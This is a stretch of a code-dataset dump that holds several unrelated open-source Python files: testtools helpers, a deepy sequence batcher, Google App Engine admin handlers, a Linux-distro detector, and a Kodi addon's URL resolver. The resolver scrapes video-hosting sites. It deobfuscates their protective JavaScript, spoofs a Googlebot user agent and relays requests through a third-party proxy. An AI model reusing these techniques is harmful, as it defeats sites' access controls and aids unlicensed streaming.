case') # Look for ASan error message. E.g. # AddressSanitizer: stack-buffer-overflow on address log_file = r['log_file'] _logger.debug('Opening log file "{}"'.format(log_file)) with open(log_file, 'r') as f: for l in f: asan_error_msg_match = ASAN_ERROR_MSG_RE.search(l) if asan_error_msg_match: type = asan_error_msg_match.group(1) failure = ASanError(msg=l.strip(), type=type, stack_trace=_parse_asan_stacktrace(f)) _logger.debug('Found asan failure: {}'.format(failure)) return failure raise Exception('ASan: Unhandled case')
mit
framon/samba
lib/testtools/testtools/helpers.py
12
4116
# Copyright (c) 2010-2012 testtools developers. See LICENSE for details. __all__ = [ 'safe_hasattr', 'try_import', 'try_imports', ] import sys def try_import(name, alternative=None, error_callback=None): """Attempt to import ``name``. If it fails, return ``alternative``. When supporting multiple versions of Python or optional dependencies, it is useful to be able to try to import a module. :param name: The name of the object to import, e.g. ``os.path`` or ``os.path.join``. :param alternative: The value to return if no module can be imported. Defaults to None. :param error_callback: If non-None, a callable that is passed the ImportError when the module cannot be loaded. """ module_segments = name.split('.') last_error = None while module_segments: module_name = '.'.join(module_segments) try: module = __import__(module_name) except ImportError: last_error = sys.exc_info()[1] module_segments.pop() continue else: break else: if last_error is not None and error_callback is not None: error_callback(last_error) return alternative nonexistent = object() for segment in name.split('.')[1:]: module = getattr(module, segment, nonexistent) if module is nonexistent: if last_error is not None and error_callback is not None: error_callback(last_error) return alternative return module _RAISE_EXCEPTION = object() def try_imports(module_names, alternative=_RAISE_EXCEPTION, error_callback=None): """Attempt to import modules. Tries to import the first module in ``module_names``. If it can be imported, we return it. If not, we go on to the second module and try that. The process continues until we run out of modules to try. If none of the modules can be imported, either raise an exception or return the provided ``alternative`` value. :param module_names: A sequence of module names to try to import. :param alternative: The value to return if no module can be imported. If unspecified, we raise an ImportError. :param error_callback: If None, called with the ImportError for *each* module that fails to load. :raises ImportError: If none of the modules can be imported and no alternative value was specified. """ module_names = list(module_names) for module_name in module_names: module = try_import(module_name, error_callback=error_callback) if module: return module if alternative is _RAISE_EXCEPTION: raise ImportError( "Could not import any of: %s" % ', '.join(module_names)) return alternative def safe_hasattr(obj, attr, _marker=object()): """Does 'obj' have an attribute 'attr'? Use this rather than built-in hasattr, as the built-in swallows exceptions in some versions of Python and behaves unpredictably with respect to properties. """ return getattr(obj, attr, _marker) is not _marker def map_values(function, dictionary): """Map ``function`` across the values of ``dictionary``. :return: A dict with the same keys as ``dictionary``, where the value of each key ``k`` is ``function(dictionary[k])``. """ return dict((k, function(dictionary[k])) for k in dictionary) def filter_values(function, dictionary): """Filter ``dictionary`` by its values using ``function``.""" return dict((k, v) for k, v in dictionary.items() if function(v)) def dict_subtract(a, b): """Return the part of ``a`` that's not in ``b``.""" return dict((k, a[k]) for k in set(a) - set(b)) def list_subtract(a, b): """Return a list ``a`` without the elements of ``b``. If a particular value is in ``a`` twice and ``b`` once then the returned list then that value will appear once in the returned list. """ a_only = list(a) for x in b: if x in a_only: a_only.remove(x) return a_only
gpl-3.0
dlacombejr/deepy
deepy/dataset/bunch_seq.py
5
2479
#!/usr/bin/env python # -*- coding: utf-8 -*- import logging as loggers logging = loggers.getLogger(__name__) from . import MiniBatches import numpy as np from deepy.utils import global_rand, FakeGenerator class BunchSequences(MiniBatches): """ Arrange sequences in bunch mode. See http://mi.eng.cam.ac.uk/~xc257/papers/RNNLMTrain_Interspeech2014.pdf . """ def __init__(self, dataset, batch_size=20, fragment_length=5): super(BunchSequences, self).__init__(dataset, batch_size=batch_size) self.fragment_length = fragment_length if self.fragment_length < 1: raise SystemError("fragment_length must be greater than 1") def _yield_data(self, subset): subset = list(subset) global_rand.shuffle(subset) bunch_stack_x = [[] for _ in range(self.size)] bunch_stack_y = [[] for _ in range(self.size)] for x, y in subset: stack_lens = map(len, bunch_stack_x) shortest_i = stack_lens.index(min(stack_lens)) bunch_stack_x[shortest_i].extend(x) bunch_stack_y[shortest_i].extend(y) self._pad_zeros(bunch_stack_x) self._pad_zeros(bunch_stack_y) pieces_x = self._cut_to_pieces(bunch_stack_x) pieces_y = self._cut_to_pieces(bunch_stack_y) logging.info("%d pieces this time" % int(float(len(bunch_stack_x[0])) / self.fragment_length)) for piece in zip(pieces_x, pieces_y): yield piece def _train_set(self): if not self.origin.train_set(): return None return self._yield_data(self.origin.train_set()) def train_set(self): return FakeGenerator(self, "_train_set") def train_size(self): size = len([_ for _ in self.train_set()]) return size def _cut_to_pieces(self, bunch_stack): """ :type bunch_stack: list of list of int """ stack_len = len(bunch_stack[0]) for i in xrange(0, stack_len, self.fragment_length): yield np.array(map(lambda stack: stack[i: i + self.fragment_length], bunch_stack)) def _pad_zeros(self, bunch_stack): """ :type bunch_stack: list of list """ min_len = min(map(len, bunch_stack)) for i in range(len(bunch_stack)): bunch_stack[i] = bunch_stack[i][:min_len] # for stack in bunch_stack: # for _ in range(max_len - len(stack)): # stack.append(0)
mit
mrquim/mrquimrepo
repo/plugin.video.LiveTV/resources/lib/URLResolverMedia.py
4
22846
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright 2015 xsteal # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. import json, re, xbmc, urllib, xbmcgui, os, sys, pprint, urlparse, urllib2, base64, math, string, socket, xbmcaddon import htmlentitydefs from cPacker import cPacker from t0mm0.common.net import Net import jsunpacker from AADecoder import AADecoder from JsParser import JsParser from JJDecoder import JJDecoder from cPacker import cPacker from png import Reader as PNGReader from HTMLParser import HTMLParser import time import HTMLParser try: import ssl context = ssl.SSLContext(ssl.PROTOCOL_TLSv1) except: pass __ADDON_ID__ = xbmcaddon.Addon().getAddonInfo("id") __ADDON__ = xbmcaddon.Addon(__ADDON_ID__) AddonTitle = __ADDON__.getAddonInfo('name') def clean(text): command={'&#8220;':'"','&#8221;':'"', '&#8211;':'-','&amp;':'&','&#8217;':"'",'&#8216;':"'"} regex = re.compile("|".join(map(re.escape, command.keys()))) return regex.sub(lambda mo: command[mo.group(0)], text) def log(msg, level=xbmc.LOGNOTICE): level = xbmc.LOGNOTICE print(AddonTitle+': %s' % (msg)) try: if isinstance(msg, unicode): msg = msg.encode('utf-8') xbmc.log(AddonTitle+': %s' % (msg), level) except Exception as e: try: a=1 except: pass class RapidVideo(): def __init__(self, url): self.url = url self.net = Net() self.headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"} self.legenda = '' def getId(self): return urlparse.urlparse(self.url).path.split("/")[-1] def abrirRapidVideo(self, url): headers = { 'User-Agent' : 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' } req = urllib2.Request('https://ooops.rf.gd/url.php?url=' + url, headers=headers) response = urllib2.urlopen(req) link=response.read() response.close() return link def getMediaUrl(self): try: sourceCode = self.net.http_GET(self.url, headers=self.headers).content.decode('unicode_escape') except: headers = { 'User-Agent' : 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)' } req = urllib2.Request('https://ooops.rf.gd/url.php?url=' + self.url, headers=headers) response = urllib2.urlopen(req) sourceCode=response.read() response.close() html_parser = HTMLParser.HTMLParser() sourceCode = html_parser.unescape(sourceCode) videoUrl = '' sPattern = '<input type="hidden" value="(\d+)" name="block">' aResult1 = self.parse(sourceCode,sPattern) if (aResult1[0] == True): sourceCode = self.net.http_POST(self.url, 'confirm.x=74&confirm.y=35&block=1', headeres=self.headers) sPattern = '"file":"([^"]+)","label":"([0-9]+)p.+?' aResult = self.parse(sourceCode, sPattern) try: self.legenda = "https://www.raptu.com%s"%re.compile('"file":"([^"]+)","label":".+?","kind":"captions"').findall(sourceCode)[0] #log(self.legenda) except: self.legenda = '' if aResult[0]: links = [] qualidades = [] for aEntry in aResult[1]: links.append(aEntry[0]) if aEntry[1] == '2160': qualidades.append('4K') else: qualidades.append(aEntry[1]+'p') if len(links) == 1: videoUrl = links[0] elif len(links) > 1: links.reverse() qualidades.reverse() qualidade = xbmcgui.Dialog().select('Escolha a qualidade', qualidades) videoUrl = links[qualidade] return videoUrl def getLegenda(self): return self.legenda def parse(self, sHtmlContent, sPattern, iMinFoundValue = 1): sHtmlContent = self.replaceSpecialCharacters(str(sHtmlContent)) aMatches = re.compile(sPattern, re.IGNORECASE).findall(sHtmlContent) if (len(aMatches) >= iMinFoundValue): return True, aMatches return False, aMatches def replaceSpecialCharacters(self, sString): return sString.replace('\\/','/').replace('&amp;','&').replace('\xc9','E').replace('&#8211;', '-').replace('&#038;', '&').replace('&rsquo;','\'').replace('\r','').replace('\n','').replace('\t','').replace('&#039;',"'") class CloudMailRu(): def __init__(self, url): self.url = url self.net = Net() self.headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"} def getId(self): return re.compile('(?:\/\/|\.)cloud\.mail\.ru\/public\/(.+)').findall(self.url)[0] def getMediaUrl(self): conteudo = self.net.http_GET(self.url).content ext = re.compile('<meta name=\"twitter:image\" content=\"(.+?)\"/>').findall(conteudo)[0] streamAux = clean(ext.split('/')[-1]) extensaoStream = clean(streamAux.split('.')[-1]) token = re.compile('"tokens"\s*:\s*{\s*"download"\s*:\s*"([^"]+)').findall(conteudo)[0] mediaLink = re.compile('"weblink_get"\s*:\s*\[.+?"url"\s*:\s*"([^"]+)').findall(conteudo)[0] videoUrl = '%s/%s?key=%s' % (mediaLink, self.getId(), token) return videoUrl, extensaoStream class GoogleVideo(): def __init__(self, url): self.url = url self.net = Net() self.headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3"} self.UA = 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0' def getId(self): return urlparse.urlparse(self.url).path.split("/")[-2] def getMediaUrl(self): req = urllib2.Request(self.url) response = urllib2.urlopen(req) sourceCode = response.read() Headers = response.headers response.close() try: sourceCode = sourceCode.decode('unicode_escape') except: pass c = Headers['Set-Cookie'] c2 = re.findall('(?:^|,) *([^;,]+?)=([^;,\/]+?);',c) if c2: cookies = '' for cook in c2: cookies = cookies + cook[0] + '=' + cook[1]+ ';' formatos = { '5': {'ext': 'flv'}, '6': {'ext': 'flv'}, '13': {'ext': '3gp'}, '17': {'ext': '3gp'}, '18': {'ext': 'mp4'}, '22': {'ext': 'mp4'}, '34': {'ext': 'flv'}, '35': {'ext': 'flv'}, '36': {'ext': '3gp'}, '37': {'ext': 'mp4'}, '38': {'ext': 'mp4'}, '43': {'ext': 'webm'}, '44': {'ext': 'webm'}, '45': {'ext': 'webm'}, '46': {'ext': 'webm'}, '59': {'ext': 'mp4'} } formatosLista = re.search(r'"fmt_list"\s*,\s*"([^"]+)', sourceCode).group(1) formatosLista = formatosLista.split(',') streamsLista = re.search(r'"fmt_stream_map"\s*,\s*"([^"]+)', sourceCode).group(1) streamsLista = streamsLista.split(',') videos = [] qualidades = [] i = 0 for stream in streamsLista: formatoId, streamUrl = stream.split('|') form = formatos.get(formatoId) extensao = form['ext'] resolucao = formatosLista[i].split('/')[1] largura, altura = resolucao.split('x') if 'mp' in extensao or 'flv' in extensao: qualidades.append(altura+'p '+extensao) videos.append(streamUrl) i+=1 qualidade = xbmcgui.Dialog().select('Escolha a qualidade', qualidades) return videos[qualidade]+'|User-Agent=' + self.UA + '&Cookie=' + cookies, qualidades[qualidade].split('p ')[-1] class UpToStream(): def __init__(self, url): self.url = url self.net = Net() self.headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0', 'Accept-Charset': 'utf-8;q=0.7,*;q=0.7'} def getId(self): if 'iframe' in self.url: return re.compile('http\:\/\/uptostream\.com\/iframe\/(.+)').findall(self.url)[0] else: return re.compile('http\:\/\/uptostream\.com\/(.+)').findall(self.url)[0] def getMediaUrl(self): sourceCode = self.net.http_GET(self.url, headers=self.headers).content links = re.compile('source\s+src=[\'\"]([^\'\"]+)[\'\"].+?data-res=[\'\"]([^\"\']+)[\'\"]').findall(sourceCode) videos = [] qualidades = [] for link, qualidade in links: if link.startswith('//'): link = "http:"+link videos.append(link) qualidades.append(qualidade) videos.reverse() qualidades.reverse() qualidade = xbmcgui.Dialog().select('Escolha a qualidade', qualidades) return videos[qualidade] class OpenLoad(): def __init__(self, url): self.url = url self.net = Net() self.id = str(self.getId()) self.messageOk = xbmcgui.Dialog().ok self.site = 'https://openload.co' #self.headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0', 'Accept-Charset': 'utf-8;q=0.7,*;q=0.7'} self.headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3', 'Accept-Encoding': 'none', 'Accept-Language': 'en-US,en;q=0.8', 'Referer': url} #Código atualizado a partir de: https://github.com/Kodi-vStream/venom-xbmc-addons/ def ASCIIDecode(self, string): i = 0 l = len(string) ret = '' while i < l: c =string[i] if string[i:(i+2)] == '\\x': c = chr(int(string[(i+2):(i+4)],16)) i+=3 if string[i:(i+2)] == '\\u': cc = int(string[(i+2):(i+6)],16) if cc > 256: #ok c'est de l'unicode, pas du ascii return '' c = chr(cc) i+=5 ret = ret + c i = i + 1 return ret def SubHexa(self, g): return g.group(1) + self.Hexa(g.group(2)) def Hexa(self, string): return str(int(string, 0)) def parseInt(self, sin): return int(''.join([c for c in re.split(r'[,.]',str(sin))[0] if c.isdigit()])) if re.match(r'\d+', str(sin), re.M) and not callable(sin) else None def CheckCpacker(self, str): sPattern = '(\s*eval\s*\(\s*function(?:.|\s)+?{}\)\))' aResult = re.findall(sPattern,str) if (aResult): str2 = aResult[0] if not str2.endswith(';'): str2 = str2 + ';' try: str = cPacker().unpack(str2) print('Cpacker encryption') except: pass return str def CheckJJDecoder(self, str): sPattern = '([a-z]=.+?\(\)\)\(\);)' aResult = re.findall(sPattern,str) if (aResult): print('JJ encryption') return JJDecoder(aResult[0]).decode() return str def CheckAADecoder(self, str): aResult = re.search('([>;]\s*)(゚ω゚.+?\(\'_\'\);)', str,re.DOTALL | re.UNICODE) if (aResult): print('AA encryption') tmp = aResult.group(1) + AADecoder(aResult.group(2)).decode() return str[:aResult.start()] + tmp + str[aResult.end():] return str def CleanCode(self, code,Coded_url): #extract complete code r = re.search(r'type="text\/javascript">(.+?)<\/script>', code,re.DOTALL) if r: code = r.group(1) #1 er decodage code = self.ASCIIDecode(code) #fh = open('c:\\html2.txt', "w") #fh.write(code) #fh.close() #extract first part P3 = "^(.+?)}\);\s*\$\(\"#videooverlay" r = re.search(P3, code,re.DOTALL) if r: code = r.group(1) else: log('er1') return False #hack a virer dans le futur code = code.replace('!![]','true') P8 = '\$\(document\).+?\(function\(\){' code= re.sub(P8,'\n',code) P4 = 'if\(!_[0-9a-z_\[\(\'\)\]]+,document[^;]+\)\){' code = re.sub(P4,'if (false) {',code) P4 = 'if\(+\'toString\'[^;]+document[^;]+\){' code = re.sub(P4,'if (false) {',code) #hexa convertion code = re.sub('([^_])(0x[0-9a-f]+)',self.SubHexa,code) #Saut de ligne #code = code.replace(';',';\n') code = code.replace('case','\ncase') code = code.replace('}','\n}\n') code = code.replace('{','{\n') #tab code = code.replace('\t','') #hack code = code.replace('!![]','true') return code def __replaceSpecialCharacters(self, sString): return sString.replace('\\/','/').replace('&amp;','&').replace('\xc9','E').replace('&#8211;', '-').replace('&#038;', '&').replace('&rsquo;','\'').replace('\r','').replace('\n','').replace('\t','').replace('&#039;',"'") def parserOPENLOADIO(self, urlF): try: req = urllib2.Request(urlF, headers={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0'}) response = urllib2.urlopen(req) html = response.read() response.close() try: html = html.encode('utf-8') except: pass TabUrl = [] sPattern = '<span id="([^"]+)">([^<>]+)<\/span>' aResult = self.parse(html, sPattern) if (aResult[0]): TabUrl = aResult[1] else: #log("No Encoded Section Found. Deleted?") raise ResolverError('No Encoded Section Found. Deleted?') sPattern = '<script src="\/assets\/js\/video-js\/video\.js.+?.js"(.+)*' aResult = self.parse(html, sPattern) if (aResult[0]): sHtmlContent2 = aResult[1][0] code = '' maxboucle = 4 sHtmlContent3 = sHtmlContent2 while (maxboucle > 0): sHtmlContent3 = self.CheckCpacker(sHtmlContent3) sHtmlContent3 = self.CheckJJDecoder(sHtmlContent3) sHtmlContent3 = self.CheckAADecoder(sHtmlContent3) maxboucle = maxboucle - 1 code = sHtmlContent3 if not (code): #log("No Encoded Section Found. Deleted?") raise ResolverError('No Encoded Section Found. Deleted?') Coded_url = '' for i in TabUrl: if len(i[1]) > 30: Coded_url = i[1] Item_url = '#'+ i[0] if not(Coded_url): raise ResolverError('No Encoded Section Found. Deleted?') code = self.CleanCode(code, Coded_url) xbmc.executebuiltin("Notification(%s,%s,%s)" % (AddonTitle, "A Descomprimir Openload, aguarde!", 15000)) JP = JsParser() Liste_var = [] JP.AddHackVar(Item_url, Coded_url) try: JP.ProcessJS(code, Liste_var) url = JP.GetVarHack("#streamurl") except: raise ResolverError('No Encoded Section Found. Deleted?') if not(url): raise ResolverError('No Encoded Section Found. Deleted?') api_call = "https://openload.co/stream/" + url + "?mime=true" if 'KDA_8nZ2av4/x.mp4' in api_call: #log('Openload.co resolve failed') raise ResolverError('Openload.co resolve failed') if url == api_call: #log('pigeon url : ' + api_call) api_call = '' raise ResolverError('pigeon url : ' + api_call) return api_call #ResolverError, except (Exception, ResolverError): try: media_id = self.getId() log("API OPENLOAD") video_url = self.__check_auth(media_id) if not video_url: video_url = self.__auth_ip(media_id) if video_url: return video_url else: raise ResolverError("Sem autorização do Openload") except ResolverError: self.messageOk(AddonTitle, 'Ocorreu um erro a obter o link. Escolha outro servidor.') def _api_get_url(self, url): result = self.net.http_GET(url).content js_result = json.loads(result) if js_result['status'] != 200: raise ResolverError(js_result['status'], js_result['msg']) return js_result def __auth_ip(self, media_id): js_data = self._api_get_url('https://api.openload.co/1/streaming/info') pair_url = js_data.get('result', {}).get('auth_url', '') if pair_url: pair_url = pair_url.replace('\/', '/') header = "Autorização do Openload" line1 = "Para visualizar este video, é necessaria autorização" line2 = "Acede ao link em baixo para permitires acesso ao video:" line3 = "[B][COLOR blue]%s[/COLOR][/B] e clica em 'Pair'" % (pair_url) with CountdownDialog(header, line1, line2, line3) as cd: return cd.start(self.__check_auth, [media_id]) def __check_auth(self, media_id): try: js_data = self._api_get_url('https://api.openload.co/1/streaming/get?file=%s' % media_id) except ResolverError as e: status, msg = e if status == 403: return else: raise ResolverError(msg) return js_data.get('result', {}).get('url') def getId(self): #return self.url.split('/')[-1] try: try: return re.compile('https\:\/\/openload\.co\/embed\/(.+)\/').findall(self.url)[0] except: return re.compile('https\:\/\/openload\.co\/embed\/(.+)').findall(self.url)[0] except: return re.compile('https\:\/\/openload.co\/f\/(.+?)\/').findall(self.url)[0] def unescape(self, text): def fixup(m): text = m.group(0) if text[:2] == "&#": try: if text[:3] == "&#x": return unichr(int(text[3:-1], 16)) else: return unichr(int(text[2:-1])) except ValueError: pass else: try: text = unichr(htmlentitydefs.name2codepoint[text[1:-1]]) except KeyError: pass return text # leave as is return re.sub("&#?\w+;", fixup, text) def getMediaUrl(self): videoUrl = self.parserOPENLOADIO(self.url) return videoUrl def getDownloadUrl(self): content = self.net.http_GET(self.url, headers=self.headers).content url = self.decodeOpenLoad(str(content.encode('utf-8'))) return url def parse(self, sHtmlContent, sPattern, iMinFoundValue = 1): sHtmlContent = self.__replaceSpecialCharacters(str(sHtmlContent)) aMatches = re.compile(sPattern, re.IGNORECASE).findall(sHtmlContent) if (len(aMatches) >= iMinFoundValue): return True, aMatches return False, aMatches def parseInt(self, sin): return int(''.join([c for c in re.split(r'[,.]',str(sin))[0] if c.isdigit()])) if re.match(r'\d+', str(sin), re.M) and not callable(sin) else None def getSubtitle(self): pageOpenLoad = self.net.http_GET(self.url, headers=self.headers).content try: subtitle = re.compile('<track\s+kind="captions"\s+src="(.+?)"').findall(pageOpenLoad)[0] except: subtitle = '' #return self.site + subtitle return subtitle class VideoMega(): def __init__(self, url): self.url = url self.net = Net() self.id = str(self.getId()) self.messageOk = xbmcgui.Dialog().ok self.site = 'https://videomega.tv' self.headers = 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25' self.headersComplete = {'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25', 'Referer': self.getNewHost()} def getId(self): return re.compile('http\:\/\/videomega\.tv\/view\.php\?ref=(.+?)&width=700&height=430').findall(self.url)[0] def getNewHost(self): return 'http://videomega.tv/cdn.php?ref=%s' % (self.id) def getMediaUrl(self): sourceCode = self.net.http_GET(self.getNewHost(), headers=self.headersComplete).content match = re.search('<source\s+src="([^"]+)"', sourceCode) if match: return match.group(1) + '|User-Agent=%s' % (self.headers) else: self.messageOk(AddonTitle, 'Video nao encontrado.') class Vidzi(): def __init__(self, url): self.url = url self.net = Net() self.id = str(self.getId()) self.messageOk = xbmcgui.Dialog().ok self.site = 'https://videomega.tv' self.headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:43.0) Gecko/20100101 Firefox/43.0', 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'} self.subtitle = '' def getId(self): return re.compile('http\:\/\/vidzi.tv\/embed-(.+?)-').findall(self.url)[0] def getNewHost(self): return 'http://vidzi.tv/embed-%s.html' % (self.id) def getMediaUrl(self): sourceCode = self.net.http_GET(self.getNewHost(), headers=self.headers).content if '404 Not Found' in sourceCode: self.messageOk(AddonTitle, 'Ficheiro nao encontrado ou removido. Escolha outro servidor.') match = re.search('file\s*:\s*"([^"]+)', sourceCode) if match: return match.group(1) + '|Referer=http://vidzi.tv/nplayer/jwpayer.flash.swf' else: for pack in re.finditer('(eval\(function.*?)</script>', sourceCode, re.DOTALL): dataJs = jsunpacker.unpack(pack.group(1)) # Unpacker for Dean Edward's p.a.c.k.e.r | THKS #print dataJs #pprint.pprint(dataJs) stream = re.search('file\s*:\s*"([^"]+)', dataJs) try: subtitle = re.compile('tracks:\[\{file:"(.+?)\.srt"').findall(dataJs)[0] subtitle += ".srt" except: try: subtitle = re.compile('tracks:\[\{file:"(.+?)\.vtt"').findall(dataJs)[0] subtitle += ".vtt" except: subtitle = '' self.subtitle = subtitle if stream: return stream.group(1) self.messageOk(AddonTitle, 'Video nao encontrado. Escolha outro servidor') def getSubtitle(self): return self.subtitle #tknorris code: https://github.com/tknorris/script.module.urlresolver/ class CountdownDialog(object): __INTERVALS = 5 def __init__(self, heading, line1='', line2='', line3='', active=True, countdown=60, interval=5): self.heading = heading self.countdown = countdown self.interval = interval self.line3 = line3 if active: #if xbmc.getCondVisibility('Window.IsVisible(progressdialog)'): # pd = ProgressDialog() #else: pd = xbmcgui.DialogProgress() if not self.line3: line3 = 'Expires in: %s seconds' % (countdown) pd.create(self.heading, line1, line2, line3) pd.update(100) self.pd = pd else: self.pd = None def __enter__(self): return self def __exit__(self, type, value, traceback): if self.pd is not None: self.pd.close() del self.pd def start(self, func, args=None, kwargs=None): if args is None: args = [] if kwargs is None: kwargs = {} result = func(*args, **kwargs) if result: return result if self.pd is not None: start = time.time() expires = time_left = self.countdown interval = self.interval while time_left > 0: for _ in range(CountdownDialog.__INTERVALS): xbmc.sleep(interval * 1000 / CountdownDialog.__INTERVALS) if self.is_canceled(): return time_left = expires - int(time.time() - start) if time_left < 0: time_left = 0 progress = time_left * 100 / expires line3 = 'Expires in: %s seconds' % (time_left) if not self.line3 else '' self.update(progress, line3=line3) result = func(*args, **kwargs) if result: return result def is_canceled(self): if self.pd is None: return False else: return self.pd.iscanceled() def update(self, percent, line1='', line2='', line3=''): if self.pd is not None: self.pd.update(percent, line1, line2, line3) class ResolverError(Exception): pass
gpl-2.0
mats116/gae-boilerplate
bp_admin/users.py
11
3991
# -*- coding: utf-8 -*- import webapp2 from google.appengine.datastore.datastore_query import Cursor from google.appengine.ext import ndb from collections import OrderedDict, Counter from wtforms import fields from bp_includes import forms from bp_includes.lib.basehandler import BaseHandler class AdminUserGeoChartHandler(BaseHandler): def get(self): users = self.user_model.query().fetch(projection=['country']) users_by_country = Counter() for user in users: if user.country: users_by_country[user.country] += 1 params = { "data": users_by_country.items() } return self.render_template('admin_users_geochart.html', **params) class EditProfileForm(forms.EditProfileForm): activated = fields.BooleanField('Activated') class AdminUserListHandler(BaseHandler): def get(self): p = self.request.get('p') q = self.request.get('q') c = self.request.get('c') forward = True if p not in ['prev'] else False cursor = Cursor(urlsafe=c) if q: qry = self.user_model.query(ndb.OR(self.user_model.last_name == q.lower(), self.user_model.email == q.lower(), self.user_model.username == q.lower())) else: qry = self.user_model.query() PAGE_SIZE = 50 if forward: users, next_cursor, more = qry.order(self.user_model.key).fetch_page(PAGE_SIZE, start_cursor=cursor) if next_cursor and more: self.view.next_cursor = next_cursor if c: self.view.prev_cursor = cursor.reversed() else: users, next_cursor, more = qry.order(-self.user_model.key).fetch_page(PAGE_SIZE, start_cursor=cursor) users = list(reversed(users)) if next_cursor and more: self.view.prev_cursor = next_cursor self.view.next_cursor = cursor.reversed() def pager_url(p, cursor): params = OrderedDict() if q: params['q'] = q if p in ['prev']: params['p'] = p if cursor: params['c'] = cursor.urlsafe() return self.uri_for('admin-users-list', **params) self.view.pager_url = pager_url self.view.q = q params = { "list_columns": [('username', 'Username'), ('name', 'Name'), ('last_name', 'Last Name'), ('email', 'Email'), ('country', 'Country'), ('tz', 'TimeZone')], "users": users, "count": qry.count() } return self.render_template('admin_users_list.html', **params) class AdminUserEditHandler(BaseHandler): def get_or_404(self, user_id): try: user = self.user_model.get_by_id(long(user_id)) if user: return user except ValueError: pass self.abort(404) def edit(self, user_id): if self.request.POST: user = self.get_or_404(user_id) if self.form.validate(): self.form.populate_obj(user) user.put() self.add_message("Changes saved!", 'success') return self.redirect_to("admin-user-edit", user_id=user_id) else: self.add_message("Could not save changes!", 'danger') else: user = self.get_or_404(user_id) self.form.process(obj=user) params = { 'user': user } return self.render_template('admin_user_edit.html', **params) @webapp2.cached_property def form(self): f = EditProfileForm(self) f.country.choices = self.countries_tuple f.tz.choices = self.tz return f
lgpl-3.0
julien78910/CouchPotatoServer
libs/pyutil/platformutil.py
106
3607
# Thanks to Daenyth for help porting this to Arch Linux. import os, platform, re, subprocess _distributor_id_cmdline_re = re.compile("(?:Distributor ID:)\s*(.*)", re.I) _release_cmdline_re = re.compile("(?:Release:)\s*(.*)", re.I) _distributor_id_file_re = re.compile("(?:DISTRIB_ID\s*=)\s*(.*)", re.I) _release_file_re = re.compile("(?:DISTRIB_RELEASE\s*=)\s*(.*)", re.I) global _distname,_version _distname = None _version = None def get_linux_distro(): """ Tries to determine the name of the Linux OS distribution name. First, try to parse a file named "/etc/lsb-release". If it exists, and contains the "DISTRIB_ID=" line and the "DISTRIB_RELEASE=" line, then return the strings parsed from that file. If that doesn't work, then invoke platform.dist(). If that doesn't work, then try to execute "lsb_release", as standardized in 2001: http://refspecs.freestandards.org/LSB_1.0.0/gLSB/lsbrelease.html The current version of the standard is here: http://refspecs.freestandards.org/LSB_3.2.0/LSB-Core-generic/LSB-Core-generic/lsbrelease.html that lsb_release emitted, as strings. Returns a tuple (distname,version). Distname is what LSB calls a "distributor id", e.g. "Ubuntu". Version is what LSB calls a "release", e.g. "8.04". A version of this has been submitted to python as a patch for the standard library module "platform": http://bugs.python.org/issue3937 """ global _distname,_version if _distname and _version: return (_distname, _version) try: etclsbrel = open("/etc/lsb-release", "rU") for line in etclsbrel: m = _distributor_id_file_re.search(line) if m: _distname = m.group(1).strip() if _distname and _version: return (_distname, _version) m = _release_file_re.search(line) if m: _version = m.group(1).strip() if _distname and _version: return (_distname, _version) except EnvironmentError: pass (_distname, _version) = platform.dist()[:2] if _distname and _version: return (_distname, _version) try: p = subprocess.Popen(["lsb_release", "--all"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) rc = p.wait() if rc == 0: for line in p.stdout.readlines(): m = _distributor_id_cmdline_re.search(line) if m: _distname = m.group(1).strip() if _distname and _version: return (_distname, _version) m = _release_cmdline_re.search(p.stdout.read()) if m: _version = m.group(1).strip() if _distname and _version: return (_distname, _version) except EnvironmentError: pass if os.path.exists("/etc/arch-release"): return ("Arch_Linux", "") return (_distname,_version) def get_platform(): # Our version of platform.platform(), telling us both less and more than the # Python Standard Library's version does. # We omit details such as the Linux kernel version number, but we add a # more detailed and correct rendition of the Linux distribution and # distribution-version. if "linux" in platform.system().lower(): return platform.system()+"-"+"_".join(get_linux_distro())+"-"+platform.machine()+"-"+"_".join([x for x in platform.architecture() if x]) else: return platform.platform()
gpl-3.0
hynnet/openwrt-mt7620
staging_dir/host/lib/python2.7/test/test_complex.py
93
27585
